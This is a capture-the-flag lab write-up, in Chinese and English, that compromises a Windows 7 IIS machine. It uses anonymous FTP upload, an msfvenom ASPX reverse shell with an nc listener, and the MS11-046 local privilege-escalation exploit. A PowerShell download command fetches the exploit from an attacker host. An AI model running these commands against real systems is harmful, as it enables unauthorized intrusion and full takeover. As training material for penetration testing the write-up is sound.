Scanning and Enumeration:
nmap:
nmap -sC -sV -O 10.10.10.5
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 04:50 EDT
Nmap scan report for 10.10.10.5
Host is up (0.19s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
....
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.13 seconds
三個端口是開啟:
✎21/tcp open ftp Microsoft ftpd
✎80/tcp open http Microsoft IIS httpd 7.5
21 port :
ftp 10.10.10.5
Name:anonymous
Password:anonymous
...
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp內有一個網頁,嘗試上傳檔案至ftp當中
put test.html
local: test.html remote: test.html
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************| 16 205.59 KiB/s --:-- ETA
226 Transfer complete.
16 bytes sent in 00:00 (0.07 KiB/s)
測試過後可以正常瀏覽檔案
Exploit:
使用msfvenom生成payload aspx file
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.30 LPORT=4444 -o reverse-shell.aspx
-p:payload
-f:format
LHOST:攻擊機IP
LPORT:攻擊機port
-o:保存payload的位置
上傳paylaod至FTP
ftp> put reverse-shell.aspx
local: reverse-shell.aspx remote: reverse-shell.aspx
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************| 2753 126.08 KiB/s --:-- ETA
226 Transfer complete.
2753 bytes sent in 00:00 (12.29 KiB/s)
ftp> dir
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
08-29-23 01:03PM 2753 reverse-shell.aspx
08-29-23 12:56PM 16 test.html
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
Run Exploit:
瀏覽: http://10.10.10.5/reverse-shell.aspx
接收reverse sehll: rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.5] 49161
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
Privilege Escalation
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
......
System Type: X86-based PC
......
Hotfix(s): N/A
......
系統:Windows 7 - 6.1.7600 N/A Build 7600 (x86)
MS11-046:
Microsoft Windows (x86) – ‘afd.sys’ Local Privilege Escalation (MS11-046)
searchsploit -m 40564 //EDB-ID
編譯說明:
apt-get updateapt-get install mingw-w64 // 安裝mingw-w64
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32 //執行編譯
將提權腳本傳送至受害機:
攻擊機: python2 -m SimpleHTTPServer 9005
受害機: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
c:\Windows\System32>whoami
whoami
nt authority\system
Get FLAG:
c:\Users\Administrator\Desktop>type root.txt
type root.txt
77b373d7...
c:\Users\babis\Desktop>type user.txt
type user.txt
62e592ad...